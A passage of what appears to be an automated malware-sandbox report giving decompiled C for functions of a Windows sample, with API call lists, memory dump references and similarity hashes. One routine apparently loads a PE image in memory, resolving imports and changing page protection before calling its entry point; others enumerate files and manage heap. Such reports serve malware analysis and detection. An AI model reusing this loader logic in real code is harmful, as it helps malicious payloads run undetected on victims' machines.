                                                                                                                                                                                              				if(_t17 < 0) {
                                                                                                                                                                                              					_t23 = _t17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t23 = 8;
                                                                                                                                                                                              					if(_v20 != _t23) {
                                                                                                                                                                                              						_t23 = 1;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t19 = E00DF4CD3(_t20, _v12);
                                                                                                                                                                                              						if(_t19 != 0) {
                                                                                                                                                                                              							 *_a16 = _t19;
                                                                                                                                                                                              							_t23 = 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						__imp__#6(_v12);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t23;
                                                                                                                                                                                              			}










                                                                                                                                                                                              0x00df7bb3
                                                                                                                                                                                              0x00df7bba
                                                                                                                                                                                              0x00df7bbb
                                                                                                                                                                                              0x00df7bbc
                                                                                                                                                                                              0x00df7bbd
                                                                                                                                                                                              0x00df7bc3
                                                                                                                                                                                              0x00df7bc8
                                                                                                                                                                                              0x00df7bc8
                                                                                                                                                                                              0x00df7bd2
                                                                                                                                                                                              0x00df7be4
                                                                                                                                                                                              0x00df7beb
                                                                                                                                                                                              0x00df7c19
                                                                                                                                                                                              0x00df7bed
                                                                                                                                                                                              0x00df7bef
                                                                                                                                                                                              0x00df7bf4
                                                                                                                                                                                              0x00df7c16
                                                                                                                                                                                              0x00df7bf6
                                                                                                                                                                                              0x00df7bf9
                                                                                                                                                                                              0x00df7c00
                                                                                                                                                                                              0x00df7c05
                                                                                                                                                                                              0x00df7c07
                                                                                                                                                                                              0x00df7c07
                                                                                                                                                                                              0x00df7c0c
                                                                                                                                                                                              0x00df7c0c
                                                                                                                                                                                              0x00df7bf4
                                                                                                                                                                                              0x00df7c20

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF642C: SysFreeString.OLEAUT32(?), ref: 00DF650B
                                                                                                                                                                                                • Part of subcall function 00DF4CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DF358E,004F0053,00000000,?), ref: 00DF4CDC
                                                                                                                                                                                                • Part of subcall function 00DF4CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DF358E,004F0053,00000000,?), ref: 00DF4D06
                                                                                                                                                                                                • Part of subcall function 00DF4CD3: memset.NTDLL ref: 00DF4D1A
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DF7C0C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 397948122-0
                                                                                                                                                                                              • Opcode ID: 0eb65e6aec39d52ad26864d29b46199d709b4b1377c6c5573337319d58f60b85
                                                                                                                                                                                              • Instruction ID: 95dee132d0fd5c4ef8ba6d373834fac50e3135e4e4ee21123ee84289fd8987eb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eb65e6aec39d52ad26864d29b46199d709b4b1377c6c5573337319d58f60b85
                                                                                                                                                                                              • Instruction Fuzzy Hash: 96015E3150411EBFDB119FA5CD049FABBB9EB04354F018465EA05E7161E7B1D962C7B0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                                                              			E00A81000(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                              
                                                                                                                                                                                              				 *0xa84150 =  *0xa84150 & 0x00000000;
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0xa8414c);
                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                              				_push(_a4);
                                                                                                                                                                                              				 *0xa84148 = 0xc; // executed
                                                                                                                                                                                              				L00A811CE(); // executed
                                                                                                                                                                                              				return __eax;
                                                                                                                                                                                              			}



                                                                                                                                                                                              0x00a81000
                                                                                                                                                                                              0x00a81007
                                                                                                                                                                                              0x00a81009
                                                                                                                                                                                              0x00a8100e
                                                                                                                                                                                              0x00a81010
                                                                                                                                                                                              0x00a81014
                                                                                                                                                                                              0x00a8101e
                                                                                                                                                                                              0x00a81023

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00A81711,00000001,00A8414C,00000000), ref: 00A8101E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3907675253-0
                                                                                                                                                                                              • Opcode ID: b3222eb80fe57ccf7a9683b5d4ec1e37d7a193caf9494ff04b38da603e3fa2ba
                                                                                                                                                                                              • Instruction ID: 98ab35b05553885a0117431f8b19052cd6cf21b0e4947a2db2c1e3e96cde065c
                                                                                                                                                                                              • Opcode Fuzzy Hash: b3222eb80fe57ccf7a9683b5d4ec1e37d7a193caf9494ff04b38da603e3fa2ba
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DC04C74240342A6E620EF809C4EF457A927768B05F110708B210251D1D3F610D68715
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF58BE(long _a4) {
                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t2 = RtlAllocateHeap( *0xdfd238, 0, _a4); // executed
                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x00df58ca
                                                                                                                                                                                              0x00df58d0

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: 5cd306c29327872048f2218e9d4ecccd409cb044ef0f764c5c06feb12ec9e86b
                                                                                                                                                                                              • Instruction ID: d785dda6ed90d7f017810d2a1d280a2231f848ac705b098dc052acfa75a8c2cb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cd306c29327872048f2218e9d4ecccd409cb044ef0f764c5c06feb12ec9e86b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AB01231040300FBCA014B00DE08F15BB23AF50700F01C010B2008827087324471EB39
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                              			E00A81ADC(void* __eax) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                              				intOrPtr* _t35;
                                                                                                                                                                                              				intOrPtr _t37;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t34 = __eax;
                                                                                                                                                                                              				_t17 = E00A81F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                                                                                                                                                                              				if(_t17 != 0) {
                                                                                                                                                                                              					_t28 = 8;
                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t33 = _v8;
                                                                                                                                                                                              					_t28 = E00A81CE4( &_v8, _t33, _t34);
                                                                                                                                                                                              					if(_t28 == 0) {
                                                                                                                                                                                              						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                                                                                                                                                              						_t28 = E00A815C2(_t33, _t37);
                                                                                                                                                                                              						if(_t28 == 0) {
                                                                                                                                                                                              							_t25 = E00A81EB4(_t37, _t33); // executed
                                                                                                                                                                                              							_t28 = _t25;
                                                                                                                                                                                              							if(_t28 == 0) {
                                                                                                                                                                                              								_push(_t25);
                                                                                                                                                                                              								_push(1);
                                                                                                                                                                                              								_push(_t33);
                                                                                                                                                                                              								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
                                                                                                                                                                                              									_t28 = GetLastError();
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t35 = _v12;
                                                                                                                                                                                              					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
                                                                                                                                                                                              					E00A81938(_t35);
                                                                                                                                                                                              					L8:
                                                                                                                                                                                              					return _t28;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}












                                                                                                                                                                                              0x00a81ae4
                                                                                                                                                                                              0x00a81b01
                                                                                                                                                                                              0x00a81b08
                                                                                                                                                                                              0x00a81b67
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81b0a
                                                                                                                                                                                              0x00a81b0a
                                                                                                                                                                                              0x00a81b14
                                                                                                                                                                                              0x00a81b18
                                                                                                                                                                                              0x00a81b1d
                                                                                                                                                                                              0x00a81b26
                                                                                                                                                                                              0x00a81b2a
                                                                                                                                                                                              0x00a81b2f
                                                                                                                                                                                              0x00a81b34
                                                                                                                                                                                              0x00a81b38
                                                                                                                                                                                              0x00a81b3d
                                                                                                                                                                                              0x00a81b3e
                                                                                                                                                                                              0x00a81b42
                                                                                                                                                                                              0x00a81b47
                                                                                                                                                                                              0x00a81b4f
                                                                                                                                                                                              0x00a81b4f
                                                                                                                                                                                              0x00a81b47
                                                                                                                                                                                              0x00a81b38
                                                                                                                                                                                              0x00a81b2a
                                                                                                                                                                                              0x00a81b51
                                                                                                                                                                                              0x00a81b5a
                                                                                                                                                                                              0x00a81b5e
                                                                                                                                                                                              0x00a81b68
                                                                                                                                                                                              0x00a81b6e
                                                                                                                                                                                              0x00a81b6e

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00A81F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00A81B06,?,?,?,?,00000002,?,?), ref: 00A81F86
                                                                                                                                                                                                • Part of subcall function 00A81F61: GetProcAddress.KERNEL32(00000000,?), ref: 00A81FA8
                                                                                                                                                                                                • Part of subcall function 00A81F61: GetProcAddress.KERNEL32(00000000,?), ref: 00A81FBE
                                                                                                                                                                                                • Part of subcall function 00A81F61: GetProcAddress.KERNEL32(00000000,?), ref: 00A81FD4
                                                                                                                                                                                                • Part of subcall function 00A81F61: GetProcAddress.KERNEL32(00000000,?), ref: 00A81FEA
                                                                                                                                                                                                • Part of subcall function 00A81F61: GetProcAddress.KERNEL32(00000000,?), ref: 00A82000
                                                                                                                                                                                                • Part of subcall function 00A81CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,00A81B14,?,?,?,?,?,?,00000002), ref: 00A81D1B
                                                                                                                                                                                                • Part of subcall function 00A81CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00A81D50
                                                                                                                                                                                                • Part of subcall function 00A815C2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 00A815F8
                                                                                                                                                                                                • Part of subcall function 00A815C2: lstrlenA.KERNEL32(?), ref: 00A8160E
                                                                                                                                                                                                • Part of subcall function 00A815C2: memset.NTDLL ref: 00A81618
                                                                                                                                                                                                • Part of subcall function 00A815C2: GetProcAddress.KERNEL32(?,00000002), ref: 00A8167B
                                                                                                                                                                                                • Part of subcall function 00A815C2: lstrlenA.KERNEL32(-00000002), ref: 00A81690
                                                                                                                                                                                                • Part of subcall function 00A815C2: memset.NTDLL ref: 00A8169A
                                                                                                                                                                                                • Part of subcall function 00A81EB4: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00A81EE2
                                                                                                                                                                                                • Part of subcall function 00A81EB4: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00A81F3A
                                                                                                                                                                                                • Part of subcall function 00A81EB4: GetLastError.KERNEL32 ref: 00A81F40
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00A81B49
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 33504255-0
                                                                                                                                                                                              • Opcode ID: 219045c6d5f00e7cdc5234842fc90d64040c5c8cb41d7aa432ee4550ebd6c35b
                                                                                                                                                                                              • Instruction ID: 763607aeea6fb55aa0d7722986f322894a407d5de82b6a070215ce5cf501ce7a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 219045c6d5f00e7cdc5234842fc90d64040c5c8cb41d7aa432ee4550ebd6c35b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9011CC726007117BDB21BBE98D8ADEB77BCAF54714B000129FA05E3241FB60ED0787A0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                              			E00DF9347(void* __ecx, signed char* _a4) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                              				signed short _t11;
                                                                                                                                                                                              				signed int _t12;
                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                              				signed short* _t22;
                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t24 = 0;
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_t19 = 1;
                                                                                                                                                                                              				_t27 = 0xdfd330;
                                                                                                                                                                                              				E00DF684E();
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t8 = E00DF32BA(_a4,  &_v8); // executed
                                                                                                                                                                                              					if(_t8 == 0) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					_t14 = 0xd;
                                                                                                                                                                                              					_t15 = E00DFA5E9(_t14);
                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                              						HeapFree( *0xdfd238, 0, _v8);
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						 *_t27 = _t15;
                                                                                                                                                                                              						_t27 = _t27 + 4;
                                                                                                                                                                                              						_t24 = _t24 + 1;
                                                                                                                                                                                              						if(_t24 < 3) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L7:
                                                                                                                                                                                              					_push(1);
                                                                                                                                                                                              					E00DF684E();
                                                                                                                                                                                              					if(_t19 != 0) {
                                                                                                                                                                                              						_t22 =  *0xdfd338; // 0x4c09b58
                                                                                                                                                                                              						_t11 =  *_t22 & 0x0000ffff;
                                                                                                                                                                                              						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                              							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *_t22 = _t12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t19;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t19 = 0;
                                                                                                                                                                                              				goto L7;
                                                                                                                                                                                              			}













                                                                                                                                                                                              0x00df934f
                                                                                                                                                                                              0x00df9353
                                                                                                                                                                                              0x00df9354
                                                                                                                                                                                              0x00df9355
                                                                                                                                                                                              0x00df935a
                                                                                                                                                                                              0x00df935f
                                                                                                                                                                                              0x00df9366
                                                                                                                                                                                              0x00df936d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df936f
                                                                                                                                                                                              0x00df9374
                                                                                                                                                                                              0x00df9375
                                                                                                                                                                                              0x00df937c
                                                                                                                                                                                              0x00df9396
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df937e
                                                                                                                                                                                              0x00df937e
                                                                                                                                                                                              0x00df9380
                                                                                                                                                                                              0x00df9383
                                                                                                                                                                                              0x00df9387
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9389
                                                                                                                                                                                              0x00df9387
                                                                                                                                                                                              0x00df939e
                                                                                                                                                                                              0x00df939e
                                                                                                                                                                                              0x00df93a0
                                                                                                                                                                                              0x00df93a7
                                                                                                                                                                                              0x00df93a9
                                                                                                                                                                                              0x00df93af
                                                                                                                                                                                              0x00df93b6
                                                                                                                                                                                              0x00df93c6
                                                                                                                                                                                              0x00df93be
                                                                                                                                                                                              0x00df93c1
                                                                                                                                                                                              0x00df93c1
                                                                                                                                                                                              0x00df93c9
                                                                                                                                                                                              0x00df93c9
                                                                                                                                                                                              0x00df93d2
                                                                                                                                                                                              0x00df93d2
                                                                                                                                                                                              0x00df939c
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF684E: GetProcAddress.KERNEL32(36776F57,00DF935F), ref: 00DF6869
                                                                                                                                                                                                • Part of subcall function 00DF32BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 00DF32E5
                                                                                                                                                                                                • Part of subcall function 00DF32BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00DF3307
                                                                                                                                                                                                • Part of subcall function 00DF32BA: memset.NTDLL ref: 00DF3321
                                                                                                                                                                                                • Part of subcall function 00DF32BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00DF335F
                                                                                                                                                                                                • Part of subcall function 00DF32BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00DF3373
                                                                                                                                                                                                • Part of subcall function 00DF32BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 00DF338A
                                                                                                                                                                                                • Part of subcall function 00DF32BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00DF3396
                                                                                                                                                                                                • Part of subcall function 00DF32BA: lstrcat.KERNEL32(?,642E2A5C), ref: 00DF33D7
                                                                                                                                                                                                • Part of subcall function 00DF32BA: FindFirstFileA.KERNEL32(?,?), ref: 00DF33ED
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: lstrlen.KERNEL32(?,00000000,00DFD330,00000001,00DF937A,00DFD00C,00DFD00C,00000000,00000005,00000000,00000000,?,?,?,00DF207E,?), ref: 00DFA5F2
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: mbstowcs.NTDLL ref: 00DFA619
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: memset.NTDLL ref: 00DFA62B
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00DFD00C,00DFD00C,00DFD00C,00000000,00000005,00000000,00000000,?,?,?,00DF207E,?,00DFD00C,?,?), ref: 00DF9396
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 983081259-0
                                                                                                                                                                                              • Opcode ID: 0773462364824dbaa25bdbdc569d49338d26df95f2ba0d1043e21db15e6d507f
                                                                                                                                                                                              • Instruction ID: 421c6587c0d9db0ed8a2101e6f81c2715be10d7da78353c7c3a088f3970c3358
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0773462364824dbaa25bdbdc569d49338d26df95f2ba0d1043e21db15e6d507f
                                                                                                                                                                                              • Instruction Fuzzy Hash: DC012836A0020DAAEB105FE6CD81B7AF6EAEB44364F17D035FB48C61D0D660DD829375
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF1B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              
                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                              					_t15 = E00DF7BA9(_a4, _a8, _a12, __edi); // executed
                                                                                                                                                                                              					_t26 = _t15;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t26 = E00DF74B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                              					if(_t26 == 0) {
                                                                                                                                                                                              						_t23 = _a8 >> 1;
                                                                                                                                                                                              						if(_t23 == 0) {
                                                                                                                                                                                              							_t26 = 2;
                                                                                                                                                                                              							HeapFree( *0xdfd238, 0, _a12);
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t21 = _a12;
                                                                                                                                                                                              							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                                                                                                                                                                              							 *__edi = _t21;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t26;
                                                                                                                                                                                              			}







                                                                                                                                                                                              0x00df1b1b
                                                                                                                                                                                              0x00df1b72
                                                                                                                                                                                              0x00df1b77
                                                                                                                                                                                              0x00df1b1d
                                                                                                                                                                                              0x00df1b37
                                                                                                                                                                                              0x00df1b3b
                                                                                                                                                                                              0x00df1b40
                                                                                                                                                                                              0x00df1b42
                                                                                                                                                                                              0x00df1b54
                                                                                                                                                                                              0x00df1b60
                                                                                                                                                                                              0x00df1b44
                                                                                                                                                                                              0x00df1b44
                                                                                                                                                                                              0x00df1b49
                                                                                                                                                                                              0x00df1b4e
                                                                                                                                                                                              0x00df1b4e
                                                                                                                                                                                              0x00df1b42
                                                                                                                                                                                              0x00df1b3b
                                                                                                                                                                                              0x00df1b7d

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,80000002,74B5F710,?,?,74B5F710,00000000,?,00DF690C,?,004F0053,04C09388,00000000,?), ref: 00DF1B60
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                              • Opcode ID: 8d9bc3047a8c62c44744dac34d0d9330d29d5f6d61e6befebbf685e6873e8593
                                                                                                                                                                                              • Instruction ID: 2c8fe4ab4596027258ecc07663a89555af7e8639d2fa5b93c4ba8fe4014ad4ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d9bc3047a8c62c44744dac34d0d9330d29d5f6d61e6befebbf685e6873e8593
                                                                                                                                                                                              • Instruction Fuzzy Hash: A0016D3610020EFBCB219F95DC01FBA3B69EF15360F06C129FB199A160E731C920DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                              			E00DFA872(intOrPtr* __edi) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t21 = __edi;
                                                                                                                                                                                              				_push( &_v12);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v8 = 0x1d4c0;
                                                                                                                                                                                              				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_v16 = _t15;
                                                                                                                                                                                              					Sleep(0x1f4); // executed
                                                                                                                                                                                              					if(_v12 == 4) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_v8 == 0) {
                                                                                                                                                                                              						L4:
                                                                                                                                                                                              						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_v8 <= 0x1f4) {
                                                                                                                                                                                              							_v16 = 0x80004004;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L8:
                                                                                                                                                                                              					return _v16;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                              			}








                                                                                                                                                                                              0x00dfa872
                                                                                                                                                                                              0x00dfa87f
                                                                                                                                                                                              0x00dfa880
                                                                                                                                                                                              0x00dfa881
                                                                                                                                                                                              0x00dfa888
                                                                                                                                                                                              0x00dfa8b6
                                                                                                                                                                                              0x00dfa8b7
                                                                                                                                                                                              0x00dfa8ba
                                                                                                                                                                                              0x00dfa8c0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa89f
                                                                                                                                                                                              0x00dfa8a9
                                                                                                                                                                                              0x00dfa8b0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa8a1
                                                                                                                                                                                              0x00dfa8a4
                                                                                                                                                                                              0x00dfa8c4
                                                                                                                                                                                              0x00dfa8a6
                                                                                                                                                                                              0x00dfa8a6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa8a6
                                                                                                                                                                                              0x00dfa8a4
                                                                                                                                                                                              0x00dfa8cb
                                                                                                                                                                                              0x00dfa8d1
                                                                                                                                                                                              0x00dfa8d1
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
